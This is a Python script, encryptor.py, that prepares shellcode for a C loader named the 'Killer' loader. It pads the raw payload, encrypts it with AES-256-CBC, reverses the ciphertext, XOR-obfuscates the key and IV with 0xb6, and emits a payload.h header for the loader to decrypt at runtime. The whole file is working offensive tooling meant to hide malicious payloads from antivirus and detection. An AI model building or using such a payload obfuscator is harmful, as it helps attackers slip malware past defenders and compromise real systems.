#!/usr/bin/env python3
"""
encryptor.py - generate payload.h for the AES-256-CBC "Killer" loader.

Pipeline (must match the C loader in killer_aes.cpp):
    raw shellcode -> PKCS7 pad -> AES-256-CBC(key, iv) -> reverse bytes
    key/iv are stored XOR-obfuscated with 0xb6 (KEY in the loader)

Usage:
    python3 encryptor.py payload.bin
    python3 encryptor.py payload.bin --key <64 hex> --iv <32 hex>
    python3 encryptor.py payload.bin -o payload.h --bin blob.bin
"""
import argparse
import secrets

from Crypto.Cipher import AES

KEY_XOR = 0xB6
BLOCK = 16


def pkcs7_pad(data: bytes, block: int = BLOCK) -> bytes:
    pad = block - (len(data) % block)
    return data + bytes([pad]) * pad


def c_array(name: str, data: bytes, per_line: int = 12, terminator=None) -> str:
    vals = list(data)
    if terminator is not None:
        vals.append(terminator)
    parts = [", ".join("0x%02x" % v for v in vals[i:i + per_line])
             for i in range(0, len(vals), per_line)]
    return "unsigned char %s[] = {\n\t%s\n};\n" % (name, ",\n\t".join(parts))


def main() -> None:
    ap = argparse.ArgumentParser(description="AES-256-CBC payload encryptor for killer_aes.cpp")
    ap.add_argument("payload", help="raw shellcode file (binary)")
    ap.add_argument("-o", "--output", default="payload.h", help="output header (default: payload.h)")
    ap.add_argument("--key", help="32-byte AES key as 64 hex chars (default: random)")
    ap.add_argument("--iv", help="16-byte IV as 32 hex chars (default: random)")
    ap.add_argument("--bin", help="also dump the stored (reversed ciphertext) blob to this file")
    args = ap.parse_args()

    plain = open(args.payload, "rb").read()
    if not plain:
        raise SystemExit("error: empty payload")
    if len(plain) % BLOCK == 0:
        print(f"[*] payload is already block-aligned ({len(plain)} bytes) - still applying full PKCS7 block")

    padded = pkcs7_pad(plain)

    key = bytes.fromhex(args.key) if args.key else secrets.token_bytes(32)
    iv = bytes.fromhex(args.iv) if args.iv else secrets.token_bytes(16)
    if len(key) != 32:
        raise SystemExit("error: key must be 64 hex chars")
    if len(iv) != 16:
        raise SystemExit("error: iv must be 32 hex chars")

    cipher = AES.new(key, AES.MODE_CBC, iv)
    ct = cipher.encrypt(padded)

    stored = ct[::-1]  # reverse(AES256_CBC(padded)) - matches reverseShellcode() + decShell()

    if args.bin:
        with open(args.bin, "wb") as f:
            f.write(stored)

    key_enc = bytes(b ^ KEY_XOR for b in key)
    iv_enc = bytes(b ^ KEY_XOR for b in iv)

    out = []
    out.append("/*")
    out.append("\tpayload.h - auto-generated by encryptor.py, do not edit by hand.")
    out.append(f"\tplain shellcode : {len(plain)} bytes")
    out.append(f"\tpadded          : {len(padded)} bytes (PKCS7)")
    out.append(f"\tstored blob     : {len(stored)} bytes = reverse(AES-256-CBC(padded))")
    out.append("\tkey/iv arrays are XOR-obfuscated with 0xb6 (loader de-obfuscates at runtime)")
    out.append("*/")
    out.append("")
    out.append(c_array("aesKeyEnc", key_enc, terminator=0x00))
    out.append("")
    out.append(c_array("aesIvEnc", iv_enc, terminator=0x00))
    out.append("")
    out.append(c_array("shellcode", stored))
    out.append("")
    out.append("const unsigned int shellcode_len = sizeof(shellcode);")
    out.append("")
    with open(args.output, "w") as f:
        f.write("\n".join(out))

    print(f"[+] wrote {args.output}")
    print(f"[+] key (hex) : {key.hex()}")
    print(f"[+] iv  (hex) : {iv.hex()}")
    print(f"[+] stored blob: {len(stored)} bytes (reverse of ciphertext)")


if __name__ == "__main__":
    main()
